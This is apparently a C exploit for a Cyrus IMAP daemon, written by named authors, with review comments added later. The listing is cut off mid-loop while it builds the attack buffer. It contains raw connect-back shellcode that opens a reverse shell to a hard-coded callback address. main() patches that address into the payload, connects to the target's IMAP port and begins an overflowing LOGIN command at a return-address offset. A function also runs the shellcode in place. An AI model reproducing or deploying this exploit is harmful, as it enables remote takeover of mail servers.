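/*
 * exploit for cyrus imap-daemon 2.8.8
 * author   b.stickler
 * coauthor w.misar
 * date     2004-11-30
 */
/* disabled 2007-08-14 */

/*
 * NOTE(review): the header names were lost when this listing was extracted
 * (only bare "#include" tokens survived).  The set below is reconstructed
 * from the calls the visible code makes: fprintf/perror (stdio.h),
 * memcpy/memset (string.h), bzero (strings.h), socket/connect
 * (sys/socket.h), struct sockaddr_in/htons (netinet/in.h), inet_pton
 * (arpa/inet.h).
 */
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Linux/x86 connect-back shellcode, 180 bytes of raw machine code.
 * Reading the bytes, it appears to do the following:
 *   - socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, 6}) via int 0x80 (eax=0x66)
 *   - build a sockaddr_in on the stack: the 4 IP bytes at offset 40 are
 *     stored XOR 0xff (keeps the payload NUL-free) and decoded by the
 *     following `xor eax, 0xffffffff` (bytes 35 ff ff ff ff); the 2 port
 *     bytes at offset 54 are already in network byte order
 *   - socketcall(SYS_CONNECT) to that address; on failure jump to exit(0)
 *   - dup2() the socket onto fds 0, 1 and 2
 *   - execve("/bin/sh", ..., NULL); the trailing '$' of the string is
 *     overwritten with a NUL terminator at run time (mov byte [ebp+7], bl)
 * As shipped the callback address is 127.0.0.1:31337 (0x7a69); main()
 * patches ip_offset/port_offset below before the payload is sent.
 * The array is deliberately writable: main() patches it in place.
 */
char shellcode[] =
    "\xeb\x74\x5d\x6a\x06\x6a\x01\x6a\x02\x8d\x1c\x24\x89\xd9\x31\xdb"
    "\xb3\x01\x31\xc0\xb0\x66\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6"
    "\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff"
    "\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x83"
    "\xec\x10\x89\x3c\x24\x89\x44\x24\x04\x31\xc0\xb0\x10\x89\x44\x24"
    "\x08\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x8d\x14\x24\x89\xd1\xcd\x80"
    "\x85\xc0\x78\x3c\x31\xc9\x31\xc0\xb0\x3f\x89\xfb\xcd\x80\x41\x80"
    "\xf9\x02\x77\x04\xeb\xf0\xeb\x2f\x83\xec\x10\x8d\x44\x24\x08\x89"
    "\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x88\x5d\x07\x89"
    "\xeb\x8d\x14\x24\x89\xd1\x31\xd2\x31\xc0\xb0\x0e\x2c\x03\xcd\x80"
    "\x31\xc0\x89\xc3\x40\xcd\x80\xe8\x56\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x24";

/* Byte offsets inside shellcode[] of the 4 XOR-0xff IP bytes and of the
 * 2 network-order port bytes of the connect-back target (see above). */
int ip_offset = 40;
int port_offset = 54;
/* XOR mask the shellcode applies to the IP bytes.  Not referenced in the
 * part of this file visible here; note 0xffffffff does not fit in int
 * (stores -1 on two's-complement targets). */
int ip_xor = 0xffffffff;

/*
 * Local smoke test: jumps into shellcode[] and executes it in place.
 *
 * WARNING: this really runs the payload in the calling process.  It opens a
 * TCP connection to the callback address currently patched into the buffer
 * and, if that succeeds, replaces this process with /bin/sh attached to the
 * socket.  It also requires an executable data segment; with non-executable
 * .data (the default with current toolchains/kernels) the indirect call
 * faults.  Casting an object pointer to a function pointer is only
 * conditionally supported in C.  Run in an isolated lab only.
 */
void test_shellcode()
{
    int (*f)();

    f = (int(*)())shellcode;
    f();
}

/*
 * Entry point.  Connects to the IMAP server at target_ip:target_port
 * (hard-coded; argc/argv are not used in the part visible here), patches the
 * connect-back address into the shellcode and starts building an IMAP LOGIN
 * command in buffer[].  The rest of the body continues past the part of the
 * file shown here.
 */
int main( int argc, char** argv )
{
    char* target_ip = "127.0.0.1";     /* attacked IMAP server */
    int target_port = 143;             /* IMAP */
    int mysocket = 0;
    struct sockaddr_in target_addr;
    int ret_pos = 496;                 /* presumably where the return address is placed in the
                                          LOGIN buffer; used past the part of the file shown here */
    char buffer[4096];
    char* ptr = buffer;
    int i = 0;

    /* connect-back IP 192.168.10.7, each byte stored XOR 0xff (see shellcode) */
    shellcode[ip_offset]   = 192 ^ 0xFF;
    shellcode[ip_offset+1] = 168 ^ 0xFF;
    shellcode[ip_offset+2] = 10 ^ 0xFF;
    shellcode[ip_offset+3] = 7 ^ 0xFF;

    /* connect-back port 33333 = 0x8235, network byte order */
    shellcode[port_offset]   = 0x82;
    shellcode[port_offset+1] = 0x35;

    bzero( &target_addr, sizeof( target_addr ) );
    target_addr.sin_family = AF_INET;
    /* inet_pton() returns 1 only on success; anything else leaves sin_addr unset */
    if( inet_pton( AF_INET, target_ip, &target_addr.sin_addr ) != 1 ) {
        fprintf( stderr, "error: invalid target address %s\n", target_ip );
        return -1;
    }
    target_addr.sin_port = htons( target_port );

    mysocket = socket( AF_INET, SOCK_STREAM, 6 ); /* 6 = IPPROTO_TCP */
    /* without this check a failed socket() is reported as a connect failure */
    if( mysocket == -1 ) {
        perror( "error: socket" );
        return -1;
    }

    if( connect( mysocket, (struct sockaddr*)&target_addr, sizeof(target_addr) ) == -1 ) {
        fprintf( stderr, "error: couldn't connect to %s\n", target_ip );
        return -1;
    }

    memset( buffer, 0, sizeof(buffer) );
    /* IMAP "<tag> LOGIN " prefix; the rest of the command is built below */
    memcpy( ptr, "a01 login ", 10 );
    ptr += 10;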
for( i=0; i